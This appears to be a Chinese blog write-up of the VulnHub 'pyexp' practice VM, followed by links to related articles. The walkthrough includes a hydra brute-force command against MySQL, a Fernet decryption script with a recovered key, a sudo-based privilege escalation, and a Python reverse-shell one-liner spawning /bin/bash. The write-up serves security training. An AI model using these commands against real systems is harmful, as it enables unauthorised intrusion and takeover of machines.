pyexp靶场

最新推荐文章于 2024-07-12 16:03:08 发布
最新推荐文章于 2024-07-12 16:03:08 发布
阅读量62 收藏
点赞数
文章标签: 服务器 linux 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_70128138/article/details/134276020
版权

Pyexp靶场

  1. 靶场链接:https://download.vulnhub.com/pyexp/pyexpvm.zip

  2. 信息收集

        2.1   ip确定

        2.2   端口扫描

        2.3   开放了3306—mysql数据库,利用数据库进行操作

        2.4   开放了1337—查看资料是ssh端口改为了1337

        2.5   暴力破解

               hydra -l root -P passwd.txt -e nsr 192.168.128.138 mysql

        2.5   远程连接数据库

        2.6   ssh服务也能暴力破解但是,字典不够强大

        2.7   查询数据库,发现有用信息

               2.7.1       fernet是python的一种加密模块,写脚本解密

from cryptography.fernet import Fernet

key='UJ5_V_b-TWKKyzlErA96f-9aEnQEfdjFbRKt8ULjdV0='

f=Fernet(key)

us=f.decrypt('gAAAAABfMbX0bqWJTTdHKUYYG9U5Y6JGCpgEiLqmYIVlWB7t8gvsuayfhLOO_cHnJQF1_ibv14si1MbL7Dgt9Odk8mKHAXLhyHZplax0v02MMzh_z_eI7ys=')

print(us)

       2.8   ssh远程连接

        2.9 查看flag1

3      提权

Sudo -l 查看sudo 不要命令的命令

        3.1   查看exp.py的脚本

        3.2 必须以sudo 命令执行该脚本

       Sudo /usr/bin/python2 /opt/exp.py

        3.3   给uinput传值,反弹shell   url: (https://www.revshells.com)--可自动生成反弹shell

Import os,pty,socket;s=socket.socket();s.connect(("127.0.0.1",9999));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("/bin/bash")

        3.4  获得root权限,查看root文件夹,查看flag

      

         3.5   上传木马的方式行不通,没有权限执行文件

      

lxxtff
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
开源靶场zsbdzsbd
04-19
【开源靶场zsbdzsbd】是一个专注于网络安全的开源项目,其主要目的是为网络安全爱好者、学生和专业人士提供一个实践和学习网络安全技能的平台。在这个靶场中,你可以找到各种模拟真实网络环境中存在的漏洞,通过实战...
uploadlabs靶场文件
02-27
这个靶场可以帮助安全研究人员、开发人员以及网络安全爱好者了解和掌握如何预防和修复文件上传漏洞。 【描述】:该靶场是基于PHPStudy的LAMP(Linux、Apache、MySQL、PHP)环境搭建的。"www"目录是Apache服务器默认...
PYTHON实现全自动化打靶(MONEY BOX)
qq_53733257的博客
11-01 168
前两天打了个靶场,hack the box的money box,正好最近在学python,于是想到用python来将整个打靶流程自动走一遍,只需要执行一个py文件,就能获得三个flag。
靶场练习第六天~vulnhub靶场之Lampiao
qq_57976347的博客
01-31 832
一、信息收集 1.靶机发现 (1)靶机lampiao与kali均为NAT模式 ,Kali的 IP为192.168.101.10, 扫描网段用命令nmap -sp192.168.101.0/24,发现靶机ip为192.168.101.107 2.靶机具体信息 (1)使用命令nmap -A (进行综合扫描) 192.168.101.107 -p 0-65535 (看看靶机开放了什么端口)正在上传…重新上传取消 3.发现1898端口开放http协议, (1)查看该网站,发现是一个博客网站 (
Pilot-Web:一款基于PythonFlask框架开发的前后端分离式渗透测试&漏洞挖掘Web靶场,内置WP与知识库的集成式教学靶场
seoppg的博客
06-13 1041
Pilot领航员靶场是基于Web安全的漏洞测试靶场,一个专为教师和学生设计的WEB安全教学实践平台,旨在帮助网安初学者快速熟悉和掌握目前常见漏洞的原理和实际利用方法,以及帮助安全实践教师在课堂环境中演示教学如何进行WEB漏洞测试。Pilot靶场由 Flask + Mysql + AdminLTE 框架编写而成,模拟每类漏洞根据不同的情况又分别设计了不同的子类,全部共有30个漏洞环境。同时,Pilot在每个环境的右上角嵌入了四个模块作为辅助工具,希望对您的学习或教学有所帮助。
靶场
qq_43627239的博客
06-13 1574
SSI注入 SSI(server side inject)的出现是为了赋予html静态页面动态的效果,通过SSI来执行系统命令,并返回对应的结果。 如果在网站目录中发现了 .stm, .shtm .shtml,并且网站对于SSL的输入没有做到严格过滤,很有可能被SSI注入攻击。 过程: 打开我们的kali攻击机和靶场 老套路终端ifconfig查看攻击机ip nmap扫描出靶场ip ...
python脚本跑SQLlib靶场_Python 是我用过最糟糕的语言之一
weixin_39636691的博客
11-14 153
搜了下知乎居然没有一个吐槽Python的,吐槽js的倒挺多。作为近年在AI加持下大热的语言,我来斗胆吐槽一下,看看是否有人感同身受,也欢迎资深Python程序员反驳start:没有Let等局部变量声明(Scala有block,Haskell,Idris,Ocaml,es6的Let, js的 var),你无法可靠地在局部引入一个变量,一不小心就把全局变量改了。我觉得这个是最无法忍受的。所有绑定都是可...
小白:适合Python 新手的5大练手项目, 你练了么?
热门推荐
qq_42022255的博客
05-08 1万+
已经学习了一段时间的Python,如果你看过之前柯西的文章,就知道是时候该进去【项目】阶段了。但是在练手项目的选择上,还存在疑问?不知道要从哪种项目先下手?柯西首先有两点建议:最好不要写太应用的程序练手,要思考什么更像是知识,老只会写写爬虫是无用的,但是完全不写也不行。对于练手的程序,要注意简化和抽象,但是如果简化不得当的话,很容易看几篇教程就被懒得下手了。接下来就给大家介绍几种适合新手的练手项目...
pikachu靶场环境
02-12
"pikachu靶场环境" 是一个专门为网络安全学习和实践设计的平台,它为用户提供了一个安全的、受控的环境来模拟真实的网络攻击与防御场景。在这个环境中,参与者可以学习和提升自己的渗透测试技巧,同时了解如何加固...
webgoat靶场需要自行搭建
01-19
WebGoat是一个知名的在线安全靶场,主要用于网络安全教育和练习,尤其在Web应用程序安全领域具有重要地位。这个项目由OWASP(开放网络应用安全项目)维护,旨在帮助开发者、安全人员以及学生理解和学习常见的Web应用...
pikachu-master靶场
07-14
"pikachu-master靶场" 是一个专门为网络安全学习和实践设计的平台,它通常包含了一系列的挑战,旨在帮助用户提升其在黑客攻防、漏洞挖掘、安全防护等领域的技能。这个压缩包文件“pikachu-master”很可能包含了该...
郑州轻工业大学卓见杯2021新生赛靶场射击2.0
weixin_52947865的博客
03-16 272
郑州轻工业大学卓见杯2020新生赛靶场射击2.0 题目描述 “欢迎来到靶场射击2.0.” 小A正在挑战一款叫做《靶场射击2.0》的游戏。游戏内共有两种靶子,一种是金色靶子,击中可以获得a积分,一种是普通靶子,击中可以获得b积分(a≥b)。每个靶子上都有一个字母,金色靶子上的为大写字母,普通靶子上的为小写字母。 当按下按键时,能得到所有对应字母相同的靶子的积分。如"WWWAAaa",按下键'A',则能得到2∗a+2∗b积分,按下键'W',则能得到3∗a积分。 小A想挑战点不一样的,他想知道当前局面,按哪个
【用python自动注入“sql手工注入靶场”】
AA8j的博客
12-07 560
踩点
CTF靶场搭建
skysys的研究小屋
01-25 1568
三步完成CTFd搭建 CTFd-Whale 推荐部署实践
UWA学堂上新|服务器AOI(Area Of Interest)算法和功能实现
最新发布
UWA—简单优化,优化简单!
07-12 362
基于.NetCore开发MMORPG分布式游戏服务器系列篇6
服务器】端口映射
2301_82023330的博客
07-11 1027
端口映射(Port Mapping)是一种网络技术,通过将一个端口的数据流重定向到另一个端口,允许外部设备访问内部网络中的特定服务。主要有本地端口映射、远程端口映射和动态端口映射三种类型。应用场景包括远程访问内部服务、穿透防火墙、提高安全性以及负载均衡和代理。本文详细介绍了端口映射的概念、类型、应用场景,并通过SSH命令示例展示如何在本地计算机上实现端口映射,以访问远程服务器上的服务。
数据库管理-第218期 服务器内存(20240711)
yhw1809的博客
07-11 853
本期简单介绍了ECC内存是如何实现校验纠错的。
【MybatisPlus】QueryWapper和LambdaQueryWrapper的区别
qq_20236937的博客
07-12 783
它通过方法引用的方式来指定实体类的属性,并提供了丰富的方法来构建查询条件。通过使用Lambda表达式,你可以创建查询条件的对象,而不是手动编写字符串,这有助于减少SQL注入的风险,提高了代码的可维护性。MyBatis-Plus 是一个基于 MyBatis 的增强工具库,旨在简化 MyBatis 的使用并提供更多的便利功能。都是 MyBatis-Plus 提供的查询条件构造器,用于构建 SQL 查询语句的条件部分。在MyBatis-Plus中,Lambda表达式的重要性体现在构建查询条件时。
WSGI 服务器教程:`execute` 方法解析
jixiaoyu0209的博客
07-11 496
通过本教程,我们详细解析了一个用于 WSGI 服务器的execute方法,解释了它如何执行 WSGI 应用程序,处理应用程序的响应数据,并确保资源被正确释放。理解这些内容有助于更好地掌握 WSGI 规范,并实现自定义的 WSGI 服务器。希望这篇教程对你有所帮助。更多详细信息和示例请参考官方文档。
pikachu靶场SQL注入.docx
09-13
"pikachu靶场SQL注入章节解题" SQL注入是一种常见的网络安全漏洞,它发生在应用程序未能正确过滤用户输入,使得恶意构造的SQL代码能够被执行。在这个"Pikachu靶场"的SQL注入关卡中,我们将深入理解如何识别和利用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值